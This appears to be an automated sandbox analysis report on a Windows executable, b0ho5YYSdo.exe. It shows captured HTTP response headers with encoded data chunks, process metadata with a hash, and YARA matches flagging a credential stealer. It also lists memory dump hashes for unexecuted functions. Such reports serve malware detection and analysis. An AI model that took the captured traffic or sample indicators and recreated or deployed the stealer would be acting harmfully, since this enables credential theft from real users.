                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=1brfbt1q2sn1uft5oct56hn7ni; expires=Mon, 21 Apr 2025 05:37:24 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L%2BItdQXnL8qdOTnAEy1aTHjdBy3Ealm3MNU0eQ0CiAI4vLY1Xnc04hIZxlrcbfvKMBahBix%2FMleQBG7lSiAFn7ZknQ5jSzqwAX7OzWT7ojAKH0LfE1x7NOj16LgYVtW1v9PnYOg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f80da8cd91f4286-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1745&rtt_var=693&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=949&delivery_rate=1536033&cwnd=252&unsent_bytes=0&cid=cc3825d9d45e91f4&ts=15082&x=0"
                                                                                                                2024-12-26 11:50:45 UTC242INData Raw: 34 39 31 63 0d 0a 67 6b 63 69 75 49 55 68 59 64 32 7a 31 6c 4a 43 73 31 46 61 74 6a 6e 33 63 67 66 56 32 67 48 6b 4a 51 4b 75 49 51 31 55 42 68 6e 35 5a 56 53 61 76 78 56 4e 2f 38 43 7a 63 48 6a 48 49 79 2f 54 46 64 55 54 59 2f 66 67 5a 34 56 4a 63 63 73 4e 4c 79 4a 72 4f 37 67 68 51 39 54 32 52 45 33 2f 31 71 35 77 65 4f 67 71 65 4e 4e 58 31 55 67 6c 73 4c 42 6a 68 55 6c 67 7a 30 70 69 4a 47 70 36 36 69 74 46 30 4f 42 43 42 62 7a 66 75 7a 63 6e 31 6a 41 77 32 46 43 61 47 6d 72 33 39 69 4f 42 58 79 43 55 41 30 41 78 63 6e 6a 50 4a 6c 48 54 70 31 78 4e 70 70 47 7a 50 47 43 4a 63 7a 76 54 57 35 73 55 59 37 36 79 61 59 78 42 59 63 70 4c 66 54 31 67 63 65 6f 6c 52 74 48 71 53 78 47 78 31 62 77 38 49 64 77 77 65 4a 6f 62
                                                                                                                Data Ascii: 491cgkciuIUhYd2z1lJCs1Fatjn3cgfV2gHkJQKuIQ1UBhn5ZVSavxVN/8CzcHjHIy/TFdUTY/fgZ4VJccsNLyJrO7ghQ9T2RE3/1q5weOgqeNNX1UglsLBjhUlgz0piJGp66itF0OBCBbzfuzcn1jAw2FCaGmr39iOBXyCUA0AxcnjPJlHTp1xNppGzPGCJczvTW5sUY76yaYxBYcpLfT1gceolRtHqSxGx1bw8IdwweJob
                                                                                                                2024-12-26 11:50:45 UTC1369INData Raw: 6b 67 67 6c 37 2f 67 77 74 45 52 78 33 56 5a 69 4a 6d 49 37 2f 32 74 5a 6d 75 42 50 51 2b 65 52 76 44 77 75 31 44 41 33 30 31 71 56 41 6d 71 33 75 32 75 4f 51 32 72 44 54 47 41 34 62 6e 7a 6f 4c 45 66 56 34 45 73 46 73 4e 4c 30 66 6d 44 57 4b 33 69 4d 47 37 55 41 5a 72 53 73 62 70 63 48 66 34 4a 61 4c 7a 46 6f 4f 37 68 6c 52 74 54 6d 54 67 4f 74 32 62 38 37 4a 63 4d 34 4d 64 6c 57 6c 52 31 76 75 4c 74 6a 67 55 31 71 77 30 6c 72 4f 32 6c 39 34 43 55 41 6c 4b 64 45 47 2f 2b 4a 39 42 4d 6c 77 54 51 30 77 68 6d 76 55 48 72 35 6f 53 4f 42 53 79 43 55 41 32 63 7a 5a 33 6a 72 4b 6b 50 53 37 46 45 44 72 64 65 35 4e 54 4c 58 4e 6a 62 65 57 49 63 61 61 37 47 37 61 6f 31 4f 5a 63 74 48 4c 33 67 6b 66 50 68 6c 47 4a 72 47 54 67 69 7a 32 36 4d 77 59 4d 35 39 49 5a 52
                                                                                                                Data Ascii: kggl7/gwtERx3VZiJmI7/2tZmuBPQ+eRvDwu1DA301qVAmq3u2uOQ2rDTGA4bnzoLEfV4EsFsNL0fmDWK3iMG7UAZrSsbpcHf4JaLzFoO7hlRtTmTgOt2b87JcM4MdlWlR1vuLtjgU1qw0lrO2l94CUAlKdEG/+J9BMlwTQ0whmvUHr5oSOBSyCUA2czZ3jrKkPS7FEDrde5NTLXNjbeWIcaa7G7ao1OZctHL3gkfPhlGJrGTgiz26MwYM59IZR
                                                                                                                2024-12-26 11:50:45 UTC1369INData Raw: 37 47 33 62 6f 6f 48 4c 6f 78 45 64 33 59 38 4f 38 6f 6d 56 4e 6e 74 41 54 61 38 33 37 6f 33 4e 70 45 73 64 73 30 62 6b 68 77 6c 37 2f 68 75 68 30 39 6d 33 6b 78 69 4e 57 70 31 37 79 42 50 30 75 64 44 44 72 72 56 76 7a 73 6a 33 44 63 71 33 6c 75 64 46 57 53 39 73 69 50 49 42 32 66 55 41 7a 64 32 56 57 7a 72 5a 33 58 5a 36 55 30 45 71 5a 47 72 66 6a 6d 52 4e 44 53 55 41 39 55 64 62 62 4b 39 62 49 64 4e 62 73 6c 4a 59 7a 35 71 65 50 49 71 52 4e 72 72 53 77 6d 79 33 37 41 34 4b 64 6f 34 50 74 52 61 6e 31 41 72 39 37 39 37 78 68 38 67 2b 45 52 6a 4f 32 73 35 31 53 5a 4f 31 4f 42 56 51 36 43 66 72 58 41 6e 33 58 4e 67 6c 46 65 63 45 47 36 39 76 47 4f 42 53 6d 58 50 52 47 77 37 59 33 48 75 49 6b 54 57 37 6b 34 46 76 39 61 77 4e 54 4c 55 4f 6a 54 59 47 39 74 51
                                                                                                                Data Ascii: 7G3booHLoxEd3Y8O8omVNntATa837o3NpEsds0bkhwl7/huh09m3kxiNWp17yBP0udDDrrVvzsj3Dcq3ludFWS9siPIB2fUAzd2VWzrZ3XZ6U0EqZGrfjmRNDSUA9UdbbK9bIdNbslJYz5qePIqRNrrSwmy37A4Kdo4PtRan1Ar9797xh8g+ERjO2s51SZO1OBVQ6CfrXAn3XNglFecEG69vGOBSmXPRGw7Y3HuIkTW7k4Fv9awNTLUOjTYG9tQ
                                                                                                                2024-12-26 11:50:45 UTC1369INData Raw: 32 66 42 32 66 41 41 7a 64 32 62 58 4c 79 4b 30 37 54 36 6b 55 4c 75 4e 2b 35 4f 79 62 61 4e 44 2f 53 56 70 30 64 59 4c 53 35 5a 34 78 56 59 38 64 4a 59 6a 77 6b 4e 61 41 69 57 4a 71 2f 41 79 53 7a 2b 4b 51 72 4d 73 64 7a 4a 35 70 43 31 52 64 70 39 2b 41 6a 68 55 68 70 77 30 74 6e 4f 57 74 2f 37 69 4e 47 31 2b 4a 4d 43 61 33 5a 75 6a 30 72 33 6a 67 71 31 46 61 52 48 47 47 2f 73 32 6e 47 43 53 44 4c 57 79 39 75 4a 45 37 74 4b 6b 44 5a 38 51 4d 63 38 63 6a 30 4e 79 79 52 61 33 6a 59 56 5a 55 66 61 62 75 7a 61 34 64 4c 62 73 74 47 5a 6a 35 73 61 65 45 68 53 4e 76 70 54 41 4b 37 31 4c 45 30 4a 39 55 31 4e 35 51 56 31 52 64 39 39 2b 41 6a 71 57 42 56 6a 6d 4a 56 64 6e 73 31 2b 57 56 48 31 71 63 62 51 37 50 53 75 44 67 76 31 7a 6f 30 33 6c 4b 65 48 47 36 7a 74
                                                                                                                Data Ascii: 2fB2fAAzd2bXLyK07T6kULuN+5OybaND/SVp0dYLS5Z4xVY8dJYjwkNaAiWJq/AySz+KQrMsdzJ5pC1Rdp9+AjhUhpw0tnOWt/7iNG1+JMCa3Zuj0r3jgq1FaRHGG/s2nGCSDLWy9uJE7tKkDZ8QMc8cj0NyyRa3jYVZUfabuza4dLbstGZj5saeEhSNvpTAK71LE0J9U1N5QV1Rd99+AjqWBVjmJVdns1+WVH1qcbQ7PSuDgv1zo03lKeHG6zt
                                                                                                                2024-12-26 11:50:45 UTC1369INData Raw: 76 7a 55 4a 70 4a 47 4e 79 38 69 74 4e 31 65 39 4c 43 72 37 56 73 54 30 6d 33 54 6b 35 30 31 57 62 47 43 58 35 2b 47 53 65 42 7a 69 4d 59 6e 38 74 64 6d 33 74 42 45 33 56 70 31 78 4e 70 70 47 7a 50 47 43 4a 63 7a 48 47 58 35 67 43 62 4c 43 32 62 49 56 56 59 63 46 49 66 54 46 72 66 2b 63 70 52 74 58 68 51 67 61 31 33 62 4d 31 4b 39 34 2f 65 4a 6f 62 6b 67 67 6c 37 2f 68 4e 6a 56 52 33 7a 30 31 6b 49 48 38 37 2f 32 74 5a 6d 75 42 50 51 2b 65 52 74 7a 73 72 31 54 4d 30 31 46 2b 59 45 48 65 34 76 32 53 50 54 48 4c 47 52 47 67 39 62 48 44 76 49 31 4c 57 36 56 45 47 72 63 50 30 66 6d 44 57 4b 33 69 4d 47 36 4d 58 64 61 65 37 49 62 64 52 59 39 70 49 59 6a 6f 6b 5a 4b 34 38 41 4e 33 72 41 31 76 2f 31 37 73 35 49 39 34 79 4d 64 68 57 6b 42 6c 67 74 72 35 6e 6a 45
                                                                                                                Data Ascii: vzUJpJGNy8itN1e9LCr7VsT0m3Tk501WbGCX5+GSeBziMYn8tdm3tBE3Vp1xNppGzPGCJczHGX5gCbLC2bIVVYcFIfTFrf+cpRtXhQga13bM1K94/eJobkggl7/hNjVR3z01kIH87/2tZmuBPQ+eRtzsr1TM01F+YEHe4v2SPTHLGRGg9bHDvI1LW6VEGrcP0fmDWK3iMG6MXdae7IbdRY9pIYjokZK48AN3rA1v/17s5I94yMdhWkBlgtr5njE
                                                                                                                2024-12-26 11:50:45 UTC1369INData Raw: 4c 79 6b 71 59 71 41 69 54 4a 71 2f 41 77 43 34 30 72 55 36 4b 64 30 38 50 39 42 4a 6e 78 64 33 74 72 6c 6f 69 30 74 67 77 55 35 6c 4e 32 31 32 37 43 68 48 33 65 68 47 51 2f 47 52 73 79 68 67 69 58 4d 5a 32 56 43 5a 53 7a 2f 33 70 79 32 66 42 32 66 41 41 7a 64 32 5a 48 48 6c 4c 30 33 5a 36 45 41 52 76 74 65 6d 4d 43 33 62 49 54 4c 66 58 70 67 64 61 4c 53 2b 5a 59 31 4c 63 73 56 44 62 44 30 6b 4e 61 41 69 57 4a 71 2f 41 79 43 6f 78 37 34 33 4c 4d 63 34 4f 64 64 4e 6d 41 41 6c 2b 66 68 79 67 56 59 67 6c 46 56 2f 49 57 4e 6b 72 6a 77 41 33 65 73 44 57 2f 2f 58 76 54 59 6e 31 7a 30 71 30 56 32 61 48 32 79 2b 76 47 75 46 52 32 54 49 52 47 6f 31 61 48 44 6e 4a 6b 2f 65 37 6b 30 4b 73 4a 48 36 63 43 66 4a 63 32 43 55 65 6f 34 54 61 62 72 34 66 4d 68 65 49 4d 74
                                                                                                                Data Ascii: LykqYqAiTJq/AwC40rU6Kd08P9BJnxd3trloi0tgwU5lN2127ChH3ehGQ/GRsyhgiXMZ2VCZSz/3py2fB2fAAzd2ZHHlL03Z6EARvtemMC3bITLfXpgdaLS+ZY1LcsVDbD0kNaAiWJq/AyCox743LMc4OddNmAAl+fhygVYglFV/IWNkrjwA3esDW//XvTYn1z0q0V2aH2y+vGuFR2TIRGo1aHDnJk/e7k0KsJH6cCfJc2CUeo4Tabr4fMheIMt
                                                                                                                2024-12-26 11:50:45 UTC1369INData Raw: 44 75 34 5a 57 44 52 38 55 59 45 71 5a 4f 42 4d 79 37 66 4e 43 36 55 52 4b 70 65 4a 62 69 69 49 39 35 2b 65 59 78 45 59 33 59 38 4f 2f 55 69 51 4e 33 39 56 51 53 7a 77 4c 38 39 4c 50 4d 38 50 38 4a 59 6d 68 4e 30 76 76 52 6f 69 77 63 75 6a 45 52 33 64 6a 77 37 7a 79 4a 57 32 63 68 41 45 72 61 52 2b 6e 41 6e 78 33 4e 67 6c 47 58 56 41 6d 61 6e 75 32 79 58 65 53 43 55 57 6c 46 32 62 32 33 6e 4e 55 50 4d 37 45 34 50 72 75 2f 30 61 48 53 44 59 57 71 47 43 59 70 51 65 6f 6a 32 49 34 63 48 4f 50 56 61 4c 79 41 6b 49 37 4a 72 41 4d 69 6e 47 30 50 34 30 71 59 69 4a 74 49 6c 4f 35 4e 6c 71 7a 64 7a 76 62 39 7a 67 56 42 76 6a 41 30 76 4f 53 51 6a 32 57 56 4a 33 66 78 53 46 62 4c 42 73 33 41 66 6e 33 4d 67 6c 41 50 56 4a 57 61 35 74 6d 53 51 56 69 33 72 56 57 55 78
                                                                                                                Data Ascii: Du4ZWDR8UYEqZOBMy7fNC6URKpeJbiiI95+eYxEY3Y8O/UiQN39VQSzwL89LPM8P8JYmhN0vvRoiwcujER3djw7zyJW2chAEraR+nAnx3NglGXVAmanu2yXeSCUWlF2b23nNUPM7E4Pru/0aHSDYWqGCYpQeoj2I4cHOPVaLyAkI7JrAMinG0P40qYiJtIlO5Nlqzdzvb9zgVBvjA0vOSQj2WVJ3fxSFbLBs3Afn3MglAPVJWa5tmSQVi3rVWUx
                                                                                                                2024-12-26 11:50:45 UTC1369INData Raw: 52 4e 31 61 74 4e 43 4c 2f 57 70 43 59 37 6e 54 73 37 7a 6b 47 72 4c 6b 36 37 76 6d 53 63 51 47 62 71 59 79 39 34 4a 48 53 67 66 58 6d 61 72 77 4d 38 38 5a 47 73 63 48 69 52 42 6a 76 61 56 5a 49 47 64 50 71 51 51 4c 78 39 49 75 42 45 65 6e 52 51 66 50 41 30 53 39 66 72 41 30 33 2f 31 2f 52 6f 63 4a 39 7a 50 4d 55 62 7a 55 41 33 37 4f 30 77 30 52 63 79 30 77 31 32 64 6e 49 37 75 48 63 4f 6d 76 55 44 57 2f 2b 57 74 79 49 79 31 7a 41 75 31 78 79 72 4c 6b 4b 35 76 32 4b 51 56 33 66 44 66 56 45 6a 5a 33 58 75 49 6c 62 4c 70 77 31 44 73 4a 48 73 43 57 43 5a 63 77 65 61 47 34 31 51 50 66 65 4e 59 49 68 4a 5a 39 70 53 49 68 46 71 66 4f 45 7a 55 4d 33 6f 41 30 33 2f 31 2f 52 6f 63 70 39 7a 50 4d 55 62 7a 55 41 33 37 4f 30 77 30 52 63 79 30 77 31 32 64 6e 49 37 75
                                                                                                                Data Ascii: RN1atNCL/WpCY7nTs7zkGrLk67vmScQGbqYy94JHSgfXmarwM88ZGscHiRBjvaVZIGdPqQQLx9IuBEenRQfPA0S9frA03/1/RocJ9zPMUbzUA37O0w0Rcy0w12dnI7uHcOmvUDW/+WtyIy1zAu1xyrLkK5v2KQV3fDfVEjZ3XuIlbLpw1DsJHsCWCZcweaG41QPfeNYIhJZ9pSIhFqfOEzUM3oA03/1/Rocp9zPMUbzUA37O0w0Rcy0w12dnI7u
                                                                                                                2024-12-26 11:50:45 UTC1369INData Raw: 6f 52 45 47 66 31 71 49 7a 59 4a 39 7a 4e 4a 51 44 31 52 46 76 70 37 56 73 67 51 74 6e 31 6b 51 76 65 43 52 31 6f 48 30 41 32 2b 31 54 44 72 44 57 2b 44 59 75 33 33 4d 6e 6d 6b 4c 56 42 69 58 76 36 79 33 47 56 53 43 55 41 79 67 31 64 6d 6e 6d 4a 6c 62 5a 6f 48 30 39 6b 73 4f 7a 49 43 4f 54 41 6a 58 51 54 59 41 54 64 62 43 47 58 61 74 56 5a 39 78 41 4c 51 64 79 65 4f 41 72 52 35 71 70 41 78 76 2f 69 66 51 64 4d 74 59 6a 4f 35 51 56 31 52 77 6c 37 2f 68 75 6c 45 42 77 7a 77 39 6f 4c 47 4d 37 2f 32 74 5a 6d 76 45 44 57 2b 79 66 39 43 4a 67 69 58 4e 2f 32 6c 61 55 45 32 75 30 71 6e 47 41 52 48 62 50 42 46 45 49 53 57 6e 6e 4e 55 4f 59 31 6b 34 48 71 63 53 33 49 43 66 76 44 52 58 47 58 49 55 54 4a 35 75 2f 62 6f 70 35 58 76 74 53 61 43 59 6d 58 65 4d 7a 51 35
                                                                                                                Data Ascii: oREGf1qIzYJ9zNJQD1RFvp7VsgQtn1kQveCR1oH0A2+1TDrDW+DYu33MnmkLVBiXv6y3GVSCUAyg1dmnmJlbZoH09ksOzICOTAjXQTYATdbCGXatVZ9xALQdyeOArR5qpAxv/ifQdMtYjO5QV1Rwl7/hulEBwzw9oLGM7/2tZmvEDW+yf9CJgiXN/2laUE2u0qnGARHbPBFEISWnnNUOY1k4HqcS3ICfvDRXGXIUTJ5u/bop5XvtSaCYmXeMzQ5


                                                                                                                050100s020406080100

                                                                                                                Click to jump to process

                                                                                                                050100s0.00102030MB

                                                                                                                Click to jump to process

                                                                                                                • File
                                                                                                                • Registry

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Target ID:0
                                                                                                                Start time:06:49:18
                                                                                                                Start date:26/12/2024
                                                                                                                Path:C:\Users\user\Desktop\b0ho5YYSdo.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\b0ho5YYSdo.exe"
                                                                                                                Imagebase:0xf50000
                                                                                                                File size:1'834'496 bytes
                                                                                                                MD5 hash:26B5AF1CFC3EFC73B6D9BE8F11412A9B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2264629296.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2287190996.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2229105379.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2228954482.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2230325310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2230936460.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2229792744.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2279546614.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2229045443.00000000006E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2261809944.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true
                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                Non-executed Functions

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, Offset: 054C9000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_54cb000_b0ho5YYSdo.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1a436c392baf2c466b0e610fc14b781101712ab6c571af5ab4efa406a58a1502
                                                                                                                • Instruction ID: 73733cddb2c506f9115597defd5cf9297d814c99b9cac2af8a2767ab4808a30a
                                                                                                                • Opcode Fuzzy Hash: 1a436c392baf2c466b0e610fc14b781101712ab6c571af5ab4efa406a58a1502
                                                                                                                • Instruction Fuzzy Hash: 00F1DF6940D3C26FCB4B9F38D96AA827F70AF17104B1A8ADFC4D1CE4A7C2598587C312
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, Offset: 054CB000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_54cb000_b0ho5YYSdo.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1a436c392baf2c466b0e610fc14b781101712ab6c571af5ab4efa406a58a1502
                                                                                                                • Instruction ID: 73733cddb2c506f9115597defd5cf9297d814c99b9cac2af8a2767ab4808a30a
                                                                                                                • Opcode Fuzzy Hash: 1a436c392baf2c466b0e610fc14b781101712ab6c571af5ab4efa406a58a1502
                                                                                                                • Instruction Fuzzy Hash: 00F1DF6940D3C26FCB4B9F38D96AA827F70AF17104B1A8ADFC4D1CE4A7C2598587C312
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, Offset: 054C9000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_54cb000_b0ho5YYSdo.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 85b3c46a4883bf0f843db7386b36e8a69cabd3b56352591e5372f201258691bd
                                                                                                                • Instruction ID: 311d69376851119d4a25e0da09652b1fea623a989a51d76cf0706f28eb7dda4b
                                                                                                                • Opcode Fuzzy Hash: 85b3c46a4883bf0f843db7386b36e8a69cabd3b56352591e5372f201258691bd
                                                                                                                • Instruction Fuzzy Hash: C031223240A6C08FCB26CF75D4555CB7FB2FF8631471984EAC4909E027C266A91ACB42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2312595522.00000000054C9000.00000004.00000800.00020000.00000000.sdmp, Offset: 054CB000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_54cb000_b0ho5YYSdo.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 85b3c46a4883bf0f843db7386b36e8a69cabd3b56352591e5372f201258691bd
                                                                                                                • Instruction ID: 311d69376851119d4a25e0da09652b1fea623a989a51d76cf0706f28eb7dda4b
                                                                                                                • Opcode Fuzzy Hash: 85b3c46a4883bf0f843db7386b36e8a69cabd3b56352591e5372f201258691bd
                                                                                                                • Instruction Fuzzy Hash: C031223240A6C08FCB26CF75D4555CB7FB2FF8631471984EAC4909E027C266A91ACB42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.2287190996.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, Offset: 006DA000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_6da000_b0ho5YYSdo.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4961894c37049463a8e58df6173c631fb6111b76602a6d3ee6b648a876c135f6
                                                                                                                • Instruction ID: 9ef62e7d04525984b138e50e026aeb4b97e866797d8ee9449150875040ab537c
                                                                                                                • Opcode Fuzzy Hash: 4961894c37049463a8e58df6173c631fb6111b76602a6d3ee6b648a876c135f6
                                                                                                                • Instruction Fuzzy Hash: 64D02B525625405BD3628F24E903E413BD4DB5520C708028088A8D6032C715B4364A08